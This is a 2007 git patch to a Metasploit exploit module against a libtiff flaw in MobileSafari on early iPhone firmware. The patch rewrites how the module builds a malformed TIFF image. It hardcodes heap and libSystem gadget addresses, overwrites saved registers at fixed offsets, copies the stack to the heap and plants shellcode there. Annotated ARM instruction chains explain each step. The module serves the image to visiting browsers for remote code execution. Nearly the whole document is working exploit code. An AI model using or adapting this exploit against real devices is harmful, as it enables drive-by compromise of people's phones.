From 49a54dfb6fef87eb033dedf0268da3d321de123d Mon Sep 17 00:00:00 2001 From: HD Moore Date: Tue, 16 Oct 2007 05:29:13 +0000 Subject: [PATCH] Total rewrite using a supah-sweet new return method. git-svn-id: file:///home/svn/framework3/trunk@5148 4d416f70-5f16-0410-b530-b9f4589650da --- modules/exploits/osx/armle/safari_libtiff.rb | 153 ++++++++++--------- 1 file changed, 83 insertions(+), 70 deletions(-) diff --git a/modules/exploits/osx/armle/safari_libtiff.rb b/modules/exploits/osx/armle/safari_libtiff.rb index 5880bf2c26..6fea291f68 100644 --- a/modules/exploits/osx/armle/safari_libtiff.rb +++ b/modules/exploits/osx/armle/safari_libtiff.rb @@ -41,7 +41,7 @@ class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote ], 'Payload' => { - 'Space' => 300, + 'Space' => 3800, 'BadChars' => "", # Multi-threaded applications are not allowed to execve() on OS X @@ -58,32 +58,18 @@ class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote }, 'Targets' => [ - [ 'MobileSafari iPhone Mac OS X Automatic', - { - 'Platform' => 'osx', - 'Arch' => ARCH_ARMLE, - 'Automatic' => true - } - ], - - [ 'MobileSafari iPhone Mac OS X armle (1.00, 1.01, 1.02)', + + [ 'MobileSafari iPhone Mac OS X (1.00, 1.01, 1.02, 1.1.1)', { 'Platform' => 'osx', - 'Arch' => ARCH_ARMLE, - 'Stack' => 0x0055a5bc, - 'Heap' => 0x0006b400, - 'Memcpy' => 0x3009a1bc, + + # Scratch space for our shellcode and stack + 'Heap' => 0x00802000, + + # Deep inside _swap_m88110_thread_state_impl_t() libSystem.dylib + 'Magic' => 0x300d562c, } - ], - [ 'MobileSafari iPhone Mac OS X armle (1.1.1)', - { - 'Platform' => 'osx', - 'Arch' => ARCH_ARMLE, - 'Stack' => 0x006f75bc, - 'Heap' => 0x0006c400, - 'Memcpy' => 0x3009a1bc, - } - ], + ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Aug 01 2006' @@ -92,20 +78,14 @@ class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote def on_request_uri(cli, req) + # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) + # Grab reference to the target t = target - if(target['Automatic']) - t = self.targets[1] - case req.headers['User-Agent'] - when /iPhone.*420\.1/ - t = self.targets[2] - end - end - - print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport} #{t.name}...") + print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the compressed response to the client send_response(cli, generate_tiff(p, t), { 'Content-Type' => 'image/tiff' }) @@ -116,50 +96,83 @@ class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote def generate_tiff(code, targ) - path = File.join(Msf::Config.install_root, "data", "exploits", "iphone_libtiff.bin") - - print_status("Opening file...") - data = File.read(path, File.size(path)) - print_status("Done...") - # - # The basic idea: - # - # Overwrite return address with: ldmia sp!, {r0, r1, r2, r3, pc} - # This loads r0-r3 and pc from the stack, jumping to the address in pc - # The address in pc is the real address of memcpy(), which takes - # parameters via the r0-r3 registers. We memcpy the stack address - # (which seems to be static across all versions) to an unused page - # on the heap. Finally, we patch up a local variable (r6) and then - # return back to the heap location we copied the stack to. + # This is a TIFF file, we have a huge range of evasion + # capabilities, but for now, we don't use them. + # - https://strikecenter.bpointsys.com/articles/2007/10/10/october-2007-microsoft-tuesday # + + dlen = 0x1000 + data = + "\x49\x49\x2a\x00\x1e\x00\x00\x00\x00\x00\x00\x00"+ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ + "\x00\x00\x00\x00\x00\x00\x08\x00\x00\x01\x03\x00"+ + "\x01\x00\x00\x00\x08\x00\x00\x00\x01\x01\x03\x00"+ + "\x01\x00\x00\x00\x08\x00\x00\x00\x03\x01\x03\x00"+ + "\x01\x00\x00\x00\xaa\x00\x00\x00\x06\x01\x03\x00"+ + "\x01\x00\x00\x00\xbb\x00\x00\x00\x11\x01\x04\x00"+ + "\x01\x00\x00\x00\x08\x00\x00\x00\x17\x01\x04\x00"+ + "\x01\x00\x00\x00\x15\x00\x00\x00\x1c\x01\x03\x00"+ + "\x01\x00\x00\x00\x01\x00\x00\x00\x50\x01\x03\x00"+ + [dlen].pack("V") + + "\x84\x00\x00\x00\x00\x00\x00\x00" + - dst_ptr = targ['Heap'] - src_ptr = targ['Stack'] - shl_len = 168 + payload.encoded.length - - # Still some wonky characters in here, this doesn't work with alpha/english/etc - patt = pattern_create(shl_len) - - # 300df800 e8bd800f ldmia sp!, {r0, r1, r2, r3, pc} - patt[120,4] = [0x300df800].pack("V") - - # memcpy(r0, r1, r2) - patt[140,4] = [targ['Memcpy']].pack("V") # memcpy @ 0x3009a1bc - patt[124,4] = [dst_ptr].pack("V") # dst - patt[128,4] = [src_ptr].pack("V") # src - patt[132,4] = [shl_len].pack("V") # len + # Randomize the bajeezus out of our data + patt = rand_text(dlen) - # fix up r6 to bypass an exception - patt[112,4] = [dst_ptr + shl_len].pack("V") + # Were going to candy mountain! + patt[120, 4] = [target['Magic']].pack("V") + + # >> add r0, r4, #0x30 + patt[104, 4] = [ targ['Heap'] - 0x30 ].pack("V") + + # Candy mountain, Charlie! + # >> mov r1, sp + + # It will be an adventure! + # >> mov r2, r8 + patt[ 92, 4] = [ patt.length ].pack("V") + + # Its a magic leoplurodon! + # It has spoken! + # It has shown us the way! + # >> bl _memcpy + + # Its just over this bridge, Charlie! + # This magical bridge! + # >> ldr r3, [r4, #32] + # >> ldrt r3, [pc], r3, lsr #30 + # >> str r3, [r4, #32] + # >> ldr r3, [r4, #36] + # >> ldrt r3, [pc], r3, lsr #30 + # >> str r3, [r4, #36] + # >> ldr r3, [r4, #40] + # >> ldrt r3, [pc], r3, lsr #30 + # >> str r3, [r4, #40] + # >> ldr r3, [r4, #44] + # >> ldrt r3, [pc], r3, lsr #30 + # >> str r3, [r4, #44] + + # We made it to candy mountain! + # Go inside Charlie! + # sub sp, r7, #0x14 + patt[116, 4] = [ targ['Heap'] + 44 + 0x14 ].pack("V") + + # Goodbye Charlie! + # ;; targ['Heap'] + 0x48 becomes the stack pointer + # >> ldmia sp!, {r8, r10} + + # Hey, what the...! + # >> ldmia sp!, {r4, r5, r6, r7, pc} - # Return back to our copied stack data - patt[164,4] = [dst_ptr + 168].pack("V") - - # Stick our shellcode into the buffer - patt[168, payload.encoded.length] = payload.encoded + # Return back to the copied heap data + patt[192, 4] = [ targ['Heap'] + 196 ].pack("V") + # Insert our actual shellcode at heap location + 196 + patt[196, payload.encoded.length] = payload.encoded + data << patt data end